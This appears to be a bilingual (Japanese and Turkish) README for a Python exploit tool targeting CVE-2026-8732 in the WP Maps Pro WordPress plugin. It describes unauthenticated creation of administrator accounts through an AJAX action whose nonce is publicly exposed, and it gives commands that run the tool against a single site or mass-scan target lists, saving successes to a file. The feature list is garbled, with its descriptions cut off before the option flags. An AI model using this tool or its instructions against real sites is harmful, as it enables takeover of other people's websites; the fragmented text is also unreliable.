
CVE-2026-8732 | WP Maps Pro <= 6.1.0 未認証の管理者作成
CVE-2026-8732 は、WP Maps Pro (wp-google-map-gold) WordPressプラグイン(バージョン <= 6.1.0)における重大な脆弱性(CVSS 9.8)です。
未認証の攻撃者は、wpgmp_temp_access_ajax AJAXアクションを悪用してWordPress管理者アカウントを作成できます。エンドポイントを保護するnonceはフロントエンドページに公開されて埋め込まれているため、アクセス制御メカニズムとして機能しません。
作成者: fientix & quake
-l)による複数ターゲットの一括スキャン。-t)。-o)。--timeout)。-v)。# 単一ターゲットスキャン
python CVE-2026-8732.py -u https://example.com -v
# 複数ターゲットの一括スキャンと結果の保存
python CVE-2026-8732.py -l targets.txt -t 20 -o success.txt
# カスタムタイムアウト(秒)
python CVE-2026-8732.py -l targets.txt --timeout 15
CVE-2026-8732, WP Maps Pro (wp-google-map-gold) WordPress eklentisinin <= 6.1.0 sürümlerinde bulunan kritik düzeyde (CVSS 9.8) bir zafiyettir.
Yetkisiz saldırganlar, wpgmp_temp_access_ajax AJAX eylemini kötüye kullanarak yetkisiz şekilde yönetici (admin) hesabı oluşturabilirler. İsteği koruması gereken nonce değeri ön yüzde herkese açık olarak yayınlandığından erişim kontrolü işlevini yitirmektedir.
Yazarlar: fientix & quake
-l).-t).-o).--timeout).-v).# Tek Hedef Taraması
python CVE-2026-8732.py -u https://example.com -v
# Çoklu Hedef Taraması ve Sonuçları Kaydetme
python CVE-2026-8732.py -l targets.txt -t 20 -o success.txt
# Özel Zaman Aşımı Süresi (Saniye)
python CVE-2026-8732.py -l targets.txt --timeout 15
"このプロジェクトへのご支援、誠にありがとうございます。@Quake-py"